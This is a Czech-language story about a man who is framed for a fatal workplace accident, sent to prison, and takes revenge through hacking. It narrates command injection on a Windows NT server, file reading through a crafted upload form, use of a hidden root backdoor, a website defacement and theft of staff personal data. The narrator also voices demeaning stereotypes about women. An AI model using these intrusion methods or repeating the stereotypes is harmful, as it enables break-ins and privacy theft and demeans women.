Když se Josef Podlaha narodil, tak právě tisíce lidí po celém světě chytali na svých příjímačích první umělý radiový signál z vesmíru - byl to Sputnik. A jak k tomu vlastně došlo? Jeho děda byl zemědělec a k tomu si ve třicátých letech přivydělával na dráze. Nechalo se z toho docela slušně žít, a proto se mohl ve svých 27 letech oženit. Právě jeho budoucí žena byl ten kámen úrazu. Pravděpodobně měla někdy v minulosti pochybné předky, ale to v tomto případě není důležité. Její základní vlastností byla skutečnost, že se musela s každým hádat. Vlastně to byl její základní povahový rys. Někde hluboko ve svém nitru měla zokódováno, že je něco lepšího, a všichni okolo ní jsou vlasně blbci a zároveň její nepřátelé. Svým postojem si rozhádala všechny sousedy a vlastně o ničem jiném se neuměla bavit, než o tom, jak jsou všichni okolo ní blbí a hloupí. V praxi takové chování vypadá tak, že se soudí o kus zahrady, pole, les a zatoulanou sousedovic kočku obviní z vraždění a požírání dospělých králíků.

Do tohoto prostředí se někdy na konci dvacátých let minulého století narodí jejich první syn, budoucí Pepíkův otec. Nejvíce povahových vlastností zdělil po své matce, ale protože byl mužského pohlaví, projevovalo se to jinak. Jaké bylo jeho dětství se neví, ale během druhé světové války si liboval v granátech, které našel po prchajících němcích. V nedalekém kostele sloužil jeden čas i jako tzv. ministrant, čehož ovšem velmi rychle zanechal a později vstoupil do komunistické strany. Jak nejlépe vystihnout jeho povahu? Asi takto: když byl již starší a ženatý, začal z toho kouřit cigarety. Pak se mu narodil syn se kterým si hrál opravdu svérazným způsobem. Když jeho synovi nebyl ještě ani rok, tak si jeho otec zapálil cigaretu a kouř mu foukal z blízkosti do obličeje tak dlouho, až se dítě začalo dusit. Měl z toho velkou zábavu a strašně se tím bavil. Když jeho syn z toho dostal černý kašel a strávil několik dní v nemocnici, tak se přestěhoval na půdu, protože tato nemoc je údajně nakažlivá. Po jeho návratu z nemocnice musel být jeho příbor uložen mimo dosah jeho syna a nebýt matky, tak dnes snad Pepík vůbec nežije, ale zase by bylo o jednoho hackera méně.

Když jsem u jeho matky, podíváme se na její rod také trochu podrobněji. Zde se neobjevují žádné zrůdné vlastnosti, jako u jejího budoucího manžela. Vlastně to byla taková dobračka, která si nechala všechno líbit, což byla také možná chyba.

Když byl Pepík větší, měl docela slušný život. Jeho otec se o něho příliš nezajímal, vlastně se o něho téměř nestaral. Když přišel z práce, tak pracoval v dílně, kde si otevřel lahvové pivo a "polibte mně všichni prdel" . Tam bylo jeho králoství, do kterého nikdo z rodiny nesměl.

Když Pepík dokončil střední školu a udělal maturitu, nastoupil ihned do práce.

Sehnal si místo ve škodovce, kde opravoval tzv. "informační technologie". V té době se jednalo o východoněmecké robotrony, které více než počítač připomínaly textilní stroj. I velikost disket připomínala spíše podnos na oběd, který se používá v závodních jídelnách. Postupně se ovšem jejich rozměry zmenšovaly a kapacita naopak rostla. Tady pracoval asi 5 let a získal velkou praxi v oboru informačních technologií. Pak ovšem nastoupil na místo jeho vedoucího strašnej kreten, který ničemu nerozuměl a byl přitom strašně chytrej.

Proto Pepík odešel pracovat ke konkurenční firmě s názvem České telekomunikace. Během jednoho roku tady zjistil velmi zajímavé praktiky. Ředitel tohoto podniku si nechával stavět od svých zaměstnanců rodinný domek, a to způsobem, který nemá u státního podniku obdoby. Vybral si jednoho vrchního mistra jako svého "stavbyvedoucího", který všechno organizoval v pracovní době. U podniku totiž pracovalo mnoho šikovných lidí, kteří ovládali spoustu řemesel. Nechá se tím hodně ušetřit, protože zaměstnanci jsou určitě méně finančně nároční, než nějaká soukromá firma. Navíc, může využívat služebních aut, pracovní doby zaměstnanců a mnoho dalšího. Dělali to velmi chytře. Anténu na střechu mu vyrobil jeden starší pracovník, a to společně s trubkami, které vyráběl jako ochrana pro kabely na přejezdech. Je pochopitelné, že všichni zaměstnanci se těchto orgií nezůčastnili. Jednalo se o lidi, kteří chodili především do práce a nic jiného je nazajímalo. Měli dost svých starostí, takže se o bytovou problematiku svého šéfa se příliž nezajímali. A to byla jejich chyba. Jednoho dne totiž přišl z vedení rozkaz, že je nutné snižovat stavy zaměstnanců. A tady byl kámen úrazu. Ti zaměstnanaci, kteří již dosáhli důchodového věku a podíleli se na stavbě rodinného sídla svého šéfa, ho začali vydírat. Předčasně do důchodu se některým z nich pochopitelně nechtělo, protože byli v dobré fyzické kondici. Ředitel se dostal do složité situace, protože domek si nechal pochopitelně stavět v pracovní době, a to kdyby se doneslo i na generální ředitelství, tak je z toho průser jako vrata. Navíc média také někdy zlobí, když navíc provoz podniku hradí všichni ze svých daní. Proto začal s několika věrnými organizovat různé akce, proti některým "měně aktivním" pracovníkům. I Pepík se mezi ně dostal. Jednou se stalo, že Josef onemocněl a byl asi dva měsíce doma. Hned jak přišel, tak mu jeho nadřízený řekl, že má jít do kanceláře ředitele. V kanceláři ho přivítal muž středního věku, který spíše než člověka připomínal vetřelce ze stejnojmeného filmu. Ředitel byl dobrý psycholog a snažil se toho využit a zatlačit svého protivníka do úzkých, a přinutit ho tak k odchodu z podniku. Jenže u Pepíka narazil. Pepíkovi bylo divné, že stejný nátlak nevyvýjel také na jiného pracovníka, který byl v té době v kriminále, protože rozšiřoval po celé republice rasistické materiály. Pak se ovšem dozvěděl, že to není možné, protože se také podílel na jeho stavbě.

Pepík v té době pracoval jako "správce digitálních systémů" a na jeho místo se tlačilo několik "stavebníků". Jednoho dne byl Pepík vyslán zcela nepochopitelně na tzv. kurs vazačů. Vůbec tomu nerozuměl, protože nikdy nic podobného nedělal. Jeho nadřízený mu sdělil, že se chystá velká akce a budou se likvidovat sloupy vzdušného vedení a používat přitom jeřáb. On se toho údajně také zůčastní. Jestli má něco proti tomu, tak si může najít klidně jinou práci. Když se vrátil z kursu, připravili na něho malé překvapení. Úmyslně použili vadný tzv. vázací prostředek, což bylo povolené ocelové lano. Jenže v kursu dostal průkaz, podle kterého odpovídá za uvázaní břemene včetně použitých vázacích prostředků. Původně chtěli sice pouze způsobit pád cívky s optickým kabel na zem, a tím jí poškodit, ale došlo k mnohem horší události. Cívka totiž pochopitelně spadla, ale na místě zabila jednoho "vojáka", která zde sloužil na náhradní vojenské službě. Tento případ pochopitelně nebyl prvním. Ještě předtím nějaký geniální vedoucí rozhodl, že pomocí měděných drátů a kladkostroje narovnají nakloněný strom, který ohrožoval vzdušné vedení. Při této operaci, kdy byly porušeny snad všechny zásady systému bezpečné práce došli také ke zranění jedno z nich. Drát pochopitelně praskunul a utržený konec vázacího prostředku zasáhl "vojáka" do hlavy. Ten utrpěl lehký těžký otřes mozku a musel být převezen do nemocnice. Rána silně krvácela a šití bylo nevyhnutné. Jenže vychytralý vedoucí moc dobře věděl, že z toho bude pěkný průser, a proto ještě otřeseného pracovníka přinutil podepsat papír, že pouze upadl z vlastní nedbalosti. Něco ve stylu "buď to podepíšeš nebo tady chcípneš."

Teď je dobré podívat se trochu podrobněji na tyto pracovníky, kteří tady "sloužili vlasti." Hlavní cíl se jim splnil, což je fakt, že nešli na vojnu. Druhým cílem v pořadí bylo nepracovat někde v domově důchodců a umývat tam starým krabům prdele. Tady se měli celkem dobře, a to i po stránce finanční - brali totiž pět tisíc čistého. Chodili do práce jak se jim chtělo, spali v pracovní době a velmi často marodili. Prostě standardní chování normálního člověka. Přesto jeden z nich tvrdil, že na vojnu nešel proto, protože tam slouží i ženy. Údajně by nesnesl, kdyby mu nějaká kráva dělala velitelku. No vlastně na tom něco bude, protože kdyby takové množství žen v armádě bylo i za druhé světové války, tak Hitler ovládl celou planetu úplně bez problémů. Ono se to těm "emancipovaným bojovnicím" dnes vyplatí, protože do skutečné války, kde se bojuje "muž proti muži" by stejně nešli, ale penízky by určitě dostaly stejné, protože diskriminace žen v armádě je nezákonná. Proto raději zpět k pepíkovi.

V jeho případě spadla klec! V tomto případě ovšem neplatí staré známé pravidlo: kdo jinému jámu kope, sám do ní padá. Začal se pochopitelně hledat viník. První, co geniálního ředitele napadlo, bylo shodit vinu na Pepíka Podlahu. Pepík nejdříve nic nechápal, a proto si ho vychytralý ředitel zavolal k sobě, a začal na něho ideologicky působit. "Podívejte se, byl jste na školení, kde vám bylo jasně řečeno, že za volbu vázacích prostředků odpovídáte vy. Co k tomu můžete říci?" Pepík mlčel a nebyl schopen nijak reagovat. Nejraději by řekl "hovno". Ředitel proto pokračoval: "policie začne pochopitelně celý případ vyšetřovat a z největší pravděpodobností vás obviní z nedbalosti, která měla za následek smrt." Pohlédl na pepíka a vítězoslavně se pousmál. Pepík se proto sebral a šel domů. V duchu si myslel, že to na něho všechno ušili, ale neměl proto žádné důkazy.

Pepík také pochopitelně vlastnil počítač. Byla to kvalitní mašina s procesorem AMD o frekvenci 1800 MHz, který spolupracoval s pamětí o velikosti 256MB a data ukládal na disk o velikosti 40GB. Používal ho pro hraní her, prohlížení obrázků, občas si vytvořil vlastní video, a to všechno na Windows XP. Vlastně počítač používal tak, jak to slyšel a viděl z mnoha reklam, tedy tak, aby jeho výkon za necelý rok nestačil na nové aplikace, a byl nucen kupovat jiný stroj - přesně podle marketingové strategie IT firem. Jenže teď nastal zlom. Pepík začal hledat všechny prostředky, které by mu pomohly zvítězit v případné soudním sporu. Začala první fáze jeho dogitální války. V jeho počítači byl také modem, a na jeho stole ležel telefon. Potřebuje získat co nejvíce informací o bezpečnosti práce a podobných záležitostech. Také jména různých lidí nebudou k zahození. Rychle si nakonfiguroval modem pro připojení do celosvětové pavučiny a během pěti minut byl připojen. Naladil si stránky úřadu bezpečnosti práce a vyhledal nějaký kontaktní email. Pak si změnil nastavení poštovního klienta, a pod jiným jménem odeslal svůj příběh na tuto adresu. Nědělal si z toho žádné velké naděje, ale nic rozumnějšího ho v daném okamžiku nenapadlo. Prostě někomu potřeboval sdělit svůj osud a internet a jeho kontaktní emaily na mnoha stránkách jsou přímo ideální zpovědnicí.

Pak ho napadlo zkusit si v prohlížeči naladit adresu svého zaměstnavatele. Podle skriptů poznal, že aplikace pracují nad systémem Windows NT, a proto zkusil jeden pokus, o kterém se dozvěděl v jedné hackerské konferenci. Trochu modifikoval adresu v příkazovém řádku prohlížeče, aby ze systému dostal informace, která by standardně dostat neměl. Zadal pár příkazů index serveru a na konci upraveného příkazu udělal tečku. Vzdálený systém si s tím neuměl poradit, a celý se z toho "posral". Ze sraček, které se objevily v okně jeho prohlížeče poznal, že se jedná o binární soubor, z něhož se pochopitelně nic nedozvěděl. Potřebuje nějaký textový fail. Pak si na to vzpoměl! Kdysi si stáhnul z jednoho hackerskýho serveru program RedButom, pomocí kterých může zjistit jména sdílených zdrojů nebo si přečíst něco z registrů. Ale pak si uvědomý, že z toho nic nezjistí. Potřebuje najít v systému všechny textové soubory, nebo ty, které jdou otevřít například ve Wordu nebo v Exelu. Vrátí se tedy zpět k modifikování příkazového řádku a zkusí další fígl. Do určité časti složitého a dlouhého příkazu vloží středník a hned za něj příkaz Dir. Vzdálený systém opět zareagoval podivně a poslal pepíkovi seznam všech souborů v systémovém adresáři. Prohlédl si několik souborů a uviděl jeden s názvem Maily.txt. Opět modifikoval příkazový řádek a obsah tohoto souboru se začal postupně objevovat v okně jeho prohlížeče. Byl velmi dlouhý a obsahoval stovky emailových adres. Okamžitě si obsah prohlížeče uložil do failu a hned začal studovat jeho obsah. A byl to opravdu kapitální úlovek! Objevil totiž seznam všech emailových adres, které se u firmy vyskytují včetně generálního ředitele, jeho náměstků atd. Ale to nebylo z daleka všechno. Na dalším řádku uviděl jejich telefonní číslo, bydliště, rodné číslo, jméno manželky a mnoho dalších osobních údajů. Fantastické! Hned si proto vyhledal svého ředitele a všechna data si opsal na kus papíru - pro jistotu:). "Ale co s tím budu dělat?" Začal nahlas přemýšlet. Zatím ho nic nenapadlo, ale časem něco určitě vymyslí.

Mezitím ovšem události dostaly rychlý spád. Asi za čtrnáct dní po vraždě, kterou zosnoval jeho ředitel mu přišlo předvolání k soudu. Jeho obhájkyně, kterou mu přidělili byla mladá absolventka právnické fakulty UK, a pravděpodobně na ní přišla chuť se vdávat. Měla totiž extrémně krátkou sukni, takže když se posadila, její kalhotky vypadaly jako výkladní skříň. Protože nebyla příliš hezká, chtěla zbalit i pepíka. Jenže když zjistila, že je nějakej divnej, ztranila o něho v tomto směru úplně zájem. Vlastně jí nezajímal vůbec a litovala, že jeho případ vzala. Chtěla se možná dobře vdát, udělat kariéru, a k tomu potřebovala obhajovat nějaký pořádný případ, nejlépe mediálně známý, který by jí pomohl k raketovému nárustu její popularity. Teď má soudit nějakého vola, který je navíc úplně blbej.

Vlastně se jednalo o jednu z mnoho standardních, tzv. emancipovaných žen, které měly nadměrně vyvynuté řečové centrum v mozku, což ovšem způsobuje nedostatek tzv. vnitřní inteligence. V praxi to potom vypadá tak, že podobné ženě jede huba jako utržený trakař, prská kolem sebe a příliš jí nezajímají názory ostatních. Většina z nich se nechce vůbec vdát, stačí, když jim nějaký "trubec" udělá dítě. Starat se o dítě a ještě manželovi prát trenýrky, tak se již v dnešní době nenosí.

Za několik dalších dní konečně začal soud s Josefem Podlahou. Když pepík vešel do soudní místnosti, neudělalo to na něho dobrý dojem. Za předsednickým stolem seděly samé ženy a nepřítomný pohled mladé zapisovatelky, která měla právě po velkém hospodském flámu, nevěstil pro pepíka nic dobrého. Vlastně už bylo o jeho osudu předem rozhodnuto, protože předsedkyně senátu byla manželkou jeho ředitele, a proto bylo v jejím osobním zájmu případ rychle ukončit. I pepík se smířil ze svým osudem, protože o úmyslně povoleném lanu, které způsobilo smrt člověka nic nevěděl, a proto o své vině nepochyboval.

Průběh soudu tomu také odpovídal. Navíc, byl horký červencový den a v budově soudu nefungovala klimatizace, protože byla v rekonstrukci. Kvůli tomu musel být průběh líčení dokonce několikrát přerušen, protože příklepová vrtačka přehlušila i kladívko tlusté předsedkyně senátu. I obžalovaný pepík Podlaha průběh líčení příliš nezdržoval, dokonce se ke svému "zločinu" vůbec ústně nevyjádřil - začal by totiž říkat kraviny a celá soudní síň by určitě propukla smíchy. Během hodiny soudkyně vynesla rozsudek: 2 roky nepodmíněně. Jeho "obhájkyně", která se jeho případu chtěla co nejrychleji zbavit mu doporučila, aby se raději neodvolával, protože by mohl dopadnout ještě hůř. Jeho odsouzení pochopitelně přivítal také jeho ředitel, protože podle zákoníku práce ho již konečně může bez problémů propustit.

Poslední úder kladívka v tlusté ruce soudkyně ukončil tu frašku. Ještě dlouho zněl v jeho uších tento zvuk a vyvolal v jeho duši podivné mrazení. Jak lehce a bez problémů byl odsouzen. A co když jsem nevinný? Proč záhadně zmizelo to lano? Proč ho vyšetřovatel policie neprozkoumal? Vždyť já vlastně nemám ještě ani průkaz vazače, protože jsem ještě neabsolvoval praktické zkoušky! Proč tady také není tzv. pověřená osoba, která u každého jeřábu odpovídá za bezpečný systém práce? Poprvé začal pepík pochybovat o své vině, a dokonce také o společnosti ve které žije, přestože si říká "demokratická". Jaký je vlastmě rozdíl mezi demokracií a totalitou? Jsou to pouze zaklínadla, která používají politici aby oblbli lidi. Když se totiž proti vám někdo spikne, tak je úplně jedno, jestli je demokracie nebo totalita. Možná, že jsou v kriminálech tisíce nevinných lidí, ale vědí to pouze oni.

Pepík se vrátí domů a spusít počítač. Vlastně je to v současné chvíli jediný kamarád, který mu rozumí. Jeho počítačové domácí centrum se však poněkud nafouklo, protože obsahovalo již sedm počítačových skříní a tři monitory, což by již představovalo malé muzeum. Všechno se to tísnilo na malém prostoru, ale desktopy spolu s minitovery, které byly na sobě ekonomicky uspořádány nezabíraly kupodivu příliž mnoho místa. Měl zde mašiny třídy 386, 486, AMDK5, klasické i MMX Pentia a pochopitelně také nejvýkonější mašinu s frekvencí 1800MHz. Pepík měl totiž mnoho aplikací, které na strojích rychlejších než 233MHz nefungovaly, a proto tolik různých počítačů. Podobně to bylo i s Linuxem a dokonce zjistil, že Windows 98 nefungují na procesorech rychlejších než 2GHz. Ale zpět k jeho příběhu. Dostal chuť se někomu pomstít, ale jak to udělat? Není žádný terorista, a vlastně ani na to nemá povahu. Pak se náhle podíval na klávesnici svého počítače a v tu chvíli uviděl svou zbraň. Připojil se do celosvětové pavučiny a na příkazový řádek prohlížeče napsal adresu nejvyššího soudu. V příkazovém řádku uviděl PHP skripty a dostal šílený nápad. V jedné konferenci, kterou si pochopitelně archivuje objevil návod, jak hledat chyby v těchto programech, které se provádějí na straně serveru. Vytvořil si k tomu jednoduchý formulář pro upload souborů, který používá tzv. metodu Post. Ten může zjednodušeně vypadat kupříkladu takto:

<form action=upload.php4 method=post>

...

<input type=file name="hack">

...

<input type=submit value="poslat">

</form>

Pak ovšem systému poslal jako proměnou ne soubor, ale textový řetězec, který definoval nějakou cestu k souboru na disku serveru. Vlastně teď nastal stejný stav, jako na systému s Windows NT - pepík může přečíst jakýkoli soubor na disku, který je majetkem nejvyššího soudu :). Pepík pak skenerem zjistil, že klasický průnik prostřednictvím nějakého portu nebude asi možný, a proto se zaměřil na "upload". Stačí k tomu formulář a chytře modifikovat příkazový řádek. Postupně si přečetl mnoho souborů na disku. Zpočátku dával přednost konfiguračním souborům, které se nacházejí v adresáři /etc. Zjistil tak konfiguraci systému a objevil naprosto šokující informaci. Původně sice klasický průnik vyloučil, ale nyní je všechno úplně jinak. Po důkladné analýze celého systému objevil totiž uživatele, který neměl nastavené žádné heslo, a navíc měl UID nula. Ten se sice jmenoval něco jako Pd45brH, takže to spíše připomínalo velmi kvalitní heslo, bez jehož znalosti prostě nemá nikdo šanci systém kompromitovat. Pepík objevil dokonale maskované zadní vrátka do systému, které mu umožní systém úplně ovládnout. Přístup přes Ssh byl povolen, takže není co řešit. Okamžitě tedy spustí tohoto klienta pro šifrovaný dálkový přístup, a za okamžik již může zadat libovolný příkaz vzdálenému operačnímu systému Linux. Vybere si jednu z mnoha svých dábelských html stránek, které má připravené pro případ, že úspěšně napadne nějaký server, což se právě stalo. Stále se mu líbí logo legendárního česko - slovenského uskupení Czert, které představuje pohyblivou hlavu ďábla. Pod tento animovaný gif pouze napíše Czert is back, a přes rcp to tam prskne, podobně jako Neologic při hacku {www.army.cz} v roce 1996. Jeho hack ovšem nevyvolal v médiích téměř žádnou reakci, pouze český underground.cz se o tom krátce zmíníl v news. Druhý den admin vrátil vše do původního stavu, ale to nic nemění na tom, že pepík má na krku další zločin.

Když se Josef Podlaha vrátil z vězení, rychle si udělal vysokou školu (MFF UK) aby ho žádnej debil nemohl poslat k jeřábu nebo k jiné fyzické práci - způsobuje to jenom problémy :)

NASA a pepíkova láska přes internet

Když se pepík vrátil z kriminálu, pokoušel se najít nějakou práci. Protože měl nálepku kriminálníka, měl pochopitelně značné problémy. Opět se integrovat do společnosti, přistoupit na její pravidla, se kterými mnohdy nesouhlasil, a v neposlední řadě také vybudovat v lidech ztracenou důvěru, kterou také pobytem za mřížemi ztratil. Přestože měl maturitu a začal dálkově studovat MFF UK, nechtěli ho nikde přijmout. Neměl žádnou praxi a bez ní nemá nikde šanci. Když už nevěděl co má dělat, přijal práci v kabelovém oddílu. Jde o hrubší práci, především s lopatou a krumpáčem. Byla zde sice možnost pracovat na optických kabelech, ale tuto fajnovou práci mu jako bývalému vězni nikdo nesvěřil. A také na lidi měl smůlu. Jeho nadřízený měl velmi silné ego, které se ovšem projevovalo tím nejhorším možným způsobem - byt to totiž rasista. Později se pepík dozvěděl, že jeho dva synové si z jeho bytu udělali skinheadské hnízdo, kde tiskli rasistické materiály, které distribuovali různými kanály po celé republice. Jeho rasizmus a xenofóbie byla tak silná, že to pocítil i pepík. Bavil se pouze s lidmi, kteří mají minimálně maturitu a čistý trestní rejstřík ve smyslu obecné kriminality. Jeden jeho kolega byl pouze vyučen a tento "vedoucí" měl k němu vztah asi jako skinhead k rómovi. Přesným opakem byl jeho vrchní mistr. Ten měl také velmi silné ego, které se pro změnu projevovalo přesně opačně. Asi se styděl za svůj egocentrizmus, a proto byl velkým humanistou. Adoptoval jednoho sirotka v Jihovýchodní Asii a měsíčně mu posílal na vzdělání tisíc korun. Pochopitelně to nedělal tajně, ale všem to hlasitě oznamoval. Také jeho chování bylo tímto ovlivněno. Asi se cítil jako Ježíš Kristus. Pepík se nechtěl nechat zatáhnout do těchto povrchních problémů a raději se soustředil na hledání nějakého děvčete, protože za tři roky v kriminále neměl žádný pohlavní styk.

Proto pepíka Podlahu jednoho dne napadlo, že se pokusí sehnat nějaké děvče prostřednictvím celosvětové pavučiny. Navštívil proto český server {www.seznamka.cz} a napsal tam stručný inzerát. Nepožadoval žádnou "vážnou známost", ale pouze dopisování přes internet. Kupodivu se mu ozvalo několik děvčat, alespoň se tak podepsaly. Jde totiž o to, že většina žen na síti sítí jsou ve skutečnosti muži a obráceně to platí také. První obětí byla nějaká Jiřina a studovala vysoké učení technické v Liberci. Její první mail byl psán spisovnou češtinou, a proto se pepík musel hodně snažit, protože jí v odpovědi nalhal, že vystudoval mateřský jazyk na Karlově univerzitě. Přesto několik hrubých pravopisných chyb ho odhalilo a milá studentka pak přestala odepisovat - asi poznala, že pepík je pěknej podvodník. Druhá oběť byla mnohem tolerantnější, přestože pracovala v astronomickém ústavu v Bondřejově, a měla také vysokoškolské vzdělání včetně uhlazené češtiny. Protože jako pozorovatel noční oblohy neměla příliž mnoho práce, začala pepíkovi pravidelně odepisovat. Ten šel na to bez obalu a požadoval zasílaní erotických emailů. Ovšem ona jaksi nejevila zájem, a tak se postupně jejich digitální konverzace změnila v klasický nicneříkající kýč. Pepík se proto jednoho dne rozhodl, že si na její server trochu posvítí. Ve Windows spustil program s názvem Yaps, který je vlastně skenerem, podobně jako legendární Nmap. Jak už to ve Windows chodí, tak výstup program poskytne ve formátu html, takže není problém soubor prohlížet třeba v Exploreru nebo v Neckách. Když konečně skener dokončil skenování, prohlídl si pepík obsah souboru a byl velmi příjemně překvapen. Kromě klasických portů 80 a 25, měl k dispozici také porty 23, 21, 22 a ještě někol dalších. Jak operační systém se po připojení Telnetem ohlásil Unix Sun, a proto okamžitě prohledal databázi exploitů na tento systém. Pochopitelně jich vlastní několik, ale všechny nějak v praxi selhaly. Proto zkusí úplně triviální věc. Připojí se přes Ftp jako anonymní uživatel a stáhne si z adresáře /etc soubor passwd. Ten sice neobsahoval pochopitelně řádek se zakódovaným heslem, ale jinak tam našel úplně všechno, včetně občanského a uživatelského jména všech uživatelů systému. To už je prostě taková vlastnost většiny starších unixových systémů, že každému řeknou téměř všechno - je vidět, že systém